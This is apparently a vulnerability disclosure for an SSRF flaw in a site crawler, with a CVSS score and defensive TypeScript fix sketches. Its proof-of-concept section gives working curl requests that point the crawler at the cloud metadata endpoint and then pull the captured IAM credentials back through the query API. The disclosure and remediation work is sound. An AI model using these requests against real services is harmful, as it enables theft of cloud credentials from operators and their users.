Website crawler SSRF — Playwright fetches internal URLs with no IP allowlist #3

@noobx123

Severity : High
CVSS : 7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Endpoint : https://vectorbase.dev/api/sources/create
https://vectorbase.dev/api/v1/sources (POST)

Summary

The website source crawler in src/lib/crawler.ts uses Playwright to fetch any user-supplied URL and stores the resulting content as searchable chunks. It does not validate that the target URL resolves to a public IP address, enabling any authenticated API key holder to direct the crawler to internal services such as the cloud provider's instance metadata endpoint, then retrieve the exfiltrated content via the query API.

Steps / PoC

  1. Create an API key via the dashboard. This requires a working account. Auth is currently broken due to a Supabase misconfiguration, so this PoC describes the attack as it would run once auth is restored, or on a self-hosted instance with a valid account.

  2. Create a website source pointing to the AWS IMDS:

curl -s -X POST https://vectorbase.dev/api/sources/create \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{
    "projectId": "<project-uuid>",
    "type": "website",
    "name": "Internal",
    "url": "http://169.254.169.254/latest/meta-data/"
  }'

Expected: the source is created and processing is triggered. The Playwright crawler fetches http://169.254.169.254/latest/meta-data/ and stores the response (EC2 metadata, IAM credentials, etc.) as embedding chunks.

  3. Retrieve the exfiltrated content:

curl -s -X POST https://vectorbase.dev/api/v1/query \
  -H "Authorization: Bearer <vb_sk_...>" \
  -H "Content-Type: application/json" \
  -d '{"query": "iam credentials role", "projectId": "<project-uuid>"}'

Expected: response includes the IMDS content (IAM role name, access key ID, secret, token).

  4. Root cause in src/lib/crawler.ts:

const browser = await chromium.launch()
const page = await browser.newPage()
await page.goto(url, { timeout: 30000, waitUntil: 'domcontentloaded' })
// No IP range check before or after DNS resolution

The crawler sets ignoreHTTPSErrors: true, follows redirects, and has no allowlist filtering on the resolved destination IP. The shouldCrawl helper only filters by file extension and a short hardcoded path list — it does not block RFC 1918 or link-local addresses. The sitemap parser (src/lib/sitemap-parser.ts) has the same gap.
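
As a rough illustration of the check that is missing, the sketch below tests an IPv4 literal against the private, link-local, and loopback ranges named in this report. The names `BLOCKED_IPV4_CIDRS`, `ipv4ToInt`, and `isBlockedIPv4` are hypothetical and do not exist in src/lib/crawler.ts. IPv6 and DNS resolution are out of scope here, and anything that is not a plain dotted quad is rejected.

```typescript
// Hypothetical helper, not part of the project's code.
// Ranges taken from this report: RFC 1918, link-local, loopback.
const BLOCKED_IPV4_CIDRS: ReadonlyArray<[string, number]> = [
  ["10.0.0.0", 8],     // RFC 1918
  ["172.16.0.0", 12],  // RFC 1918
  ["192.168.0.0", 16], // RFC 1918
  ["169.254.0.0", 16], // link-local, includes the instance metadata endpoint
  ["127.0.0.0", 8],    // loopback
];

// Convert a dotted-quad string to an unsigned 32-bit value, or null if malformed.
function ipv4ToInt(address: string): number | null {
  const parts = address.split(".");
  if (parts.length !== 4) return null;
  let value = 0;
  for (const part of parts) {
    if (!/^\d{1,3}$/.test(part)) return null;
    const octet = Number(part);
    if (octet > 255) return null;
    value = value * 256 + octet;
  }
  return value;
}

// True when the address must not be fetched by the crawler.
function isBlockedIPv4(address: string): boolean {
  const ip = ipv4ToInt(address);
  if (ip === null) return true; // fail closed on anything that is not a dotted quad
  return BLOCKED_IPV4_CIDRS.some(([base, prefix]) => {
    const start = ipv4ToInt(base) as number;
    const size = 2 ** (32 - prefix); // number of addresses in the block
    return ip >= start && ip < start + size;
  });
}
```

With this sketch, `isBlockedIPv4("169.254.169.254")` returns true and `isBlockedIPv4("8.8.8.8")` returns false. A check of this kind only helps if it is applied to the address the hostname resolves to, not to the hostname string.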

Impact

An API key holder can read the cloud instance metadata endpoint (IAM credentials, user-data scripts), internal HTTP services, and any address reachable from the deployment network, then query the stored chunks to extract the captured content.

Fix

  1. Resolve each URL's destination IP before Playwright fetches it; block RFC 1918 (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local (169.254.0.0/16), and loopback (127.0.0.0/8) addresses, as well as hostnames matching *.internal.
  2. Re-validate the resolved IP after any redirect, as Playwright follows redirects natively.
  3. Consider a separate egress-restricted network sandbox for the crawler process.
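
Items 1 and 2 could be sketched roughly as a single per-URL check that runs on the initial target and again on every redirect hop. Everything named here (`Resolver`, `isBlockedAddress`, `assertPublicUrl`) is hypothetical and not taken from the project. The resolver is injected so the sketch stays independent of any DNS library; in Node it could wrap `dns.promises.lookup(hostname, { all: true })`, which is an assumption about the deployment. The sketch handles IPv4 only and rejects everything else.

```typescript
// Hypothetical sketch: names and signatures are illustrative, not the project's API.
// A resolver returns every address a hostname maps to (an IP literal maps to itself).
type Resolver = (hostname: string) => Promise<string[]>;

// True for private, link-local, and loopback IPv4 addresses.
// Anything that is not a well-formed dotted quad (including IPv6) is rejected.
function isBlockedAddress(address: string): boolean {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(address);
  if (!m) return true;
  const octets = [m[1], m[2], m[3], m[4]].map(Number);
  if (octets.some((o) => o > 255)) return true;
  const [a, b] = octets;
  return (
    a === 10 ||                          // 10.0.0.0/8
    a === 127 ||                         // 127.0.0.0/8
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
    (a === 192 && b === 168) ||          // 192.168.0.0/16
    (a === 169 && b === 254)             // 169.254.0.0/16
  );
}

// Throws unless the URL uses http(s), is not under *.internal,
// and every address it resolves to is outside the blocked ranges.
async function assertPublicUrl(rawUrl: string, resolve: Resolver): Promise<void> {
  const url = new URL(rawUrl);
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    throw new Error(`Blocked scheme: ${url.protocol}`);
  }
  const host = url.hostname.toLowerCase();
  if (host.endsWith(".internal")) {
    throw new Error(`Blocked hostname: ${host}`);
  }
  const addresses = await resolve(host);
  // Reject when resolution fails or when any returned address is internal.
  if (addresses.length === 0 || addresses.some(isBlockedAddress)) {
    throw new Error(`Blocked destination for ${host}`);
  }
}
```

The crawler would call `assertPublicUrl` before the first fetch and again with each redirect target; how those hops are surfaced from Playwright is left out of the sketch. A check performed before the fetch cannot guarantee that the browser connects to the same address it validated, since DNS answers can change in between, which is one reason the egress-restricted sandbox in item 3 is worth having in addition.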
